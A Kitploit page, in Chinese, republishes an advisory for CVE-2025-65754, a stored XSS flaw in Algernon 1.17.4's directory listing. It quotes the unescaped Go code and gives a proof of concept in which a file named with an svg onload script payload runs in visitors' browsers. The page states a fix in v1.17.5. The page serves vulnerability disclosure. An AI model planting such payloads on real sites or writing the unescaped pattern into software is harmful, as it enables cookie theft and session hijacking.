Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-65754 — Algernon v1.17.4 受到一个跨站脚本(XSS)漏洞的影响,攻击者可通过向文件名中注入特制的payload来执行任意代码。 | Kitploit
工具/GitHubGitHub/bnyt7/cve-2025-65754
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubbnyt7/cve-2025-65754

CVE-2025-65754

Algernon v1.17.4 受到一个跨站脚本(XSS)漏洞的影响,攻击者可通过向文件名中注入特制的payload来执行任意代码。

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-65754:Algernon 1.17.4 中的存储型 XSS

描述

Algernon v1.17.4 存在跨站脚本(XSS)漏洞,攻击者可通过精心构造的文件名有效载荷执行任意代码。

  • 受影响项目:Algernon - 1.17.4
  • 项目维护者:Alexander F. Rødseth (xyproto)
  • 漏洞类型:跨站脚本(XSS)
  • 攻击向量:攻击者可上传包含恶意名称的文件,以更改网站内容或窃取 Cookie 劫持会话。

部分变量未进行清理。 例如:

engine/dirhandler.go 第 80-108 行

root@kitploit:~

filename := item.Name()  // Get filename from filesystem
// ...
buf.WriteString(themes.HTMLLink(filename, URLpath, ac.fs.IsDir(fullFilename)))

themes/html.go 第 124-132 行

root@kitploit:~
func HTMLLink(text, url string, isDirectory bool) string {
    if isDirectory {
        text += "/"
        url += "/"
    }
    return "<a href=\"/" + url + "\">" + text + "</a><br>"
    // 'text' (filename) is inserted directly without HTML escaping
}

从文件系统获取的文件名直接插入到 HTML 中,未进行 HTML 转义,出现在目录列表中。

PoC

root@kitploit:~
$ algernon -v                                  
Algernon 1.17.4

在一个目录中,创建以 XSS 有效载荷为名称的文件。

root@kitploit:~
# XSS 有效载荷 1:简单弹窗
$touch "test.txt"

# XSS 有效载荷 2:文件名中的事件处理
$touch "document<svg onload=alert(document.domain)>.svg"

在同一个仓库中,运行应用。

root@kitploit:~
algernon
root@kitploit:~
Server directory:       .
Server address:         :3000
Database:               Bolt (/tmp/algernon.db)
Cache mode:             On
Cache size:             1048576 bytes
TLS certificate:        cert.pem
TLS key:                key.pem
Request limit:          10/sec per visitor
Large file threshold:   44040192 bytes
Large file timeout:     10 sec
INFO[0000] Serving HTTP/2 on https://localhost:3000/    
ERRO[0000] open cert.pem: no such file or directory. Not serving HTTP/2. 
INFO[0000] Use the -t flag for serving regular HTTP.    
INFO[0000] Serving HTTP on http://localhost:3000/      

访问以下 URL,将出现弹窗。

利用 onerror 的 XSS 弹窗

利用 document.location 的 XSS 弹窗

文件

该问题已在 v1.17.5 中修复。

参考

  • https://algernon.roboticoverlords.org/
  • https://github.com/xyproto/algernon/releases/tag/v1.17.5
  • https://github.com/xyproto/algernon/commit/cd8832014a624a9aeab60566434c3344135e23f8

发现者:Benoit H. (Bnyt7)

下载工具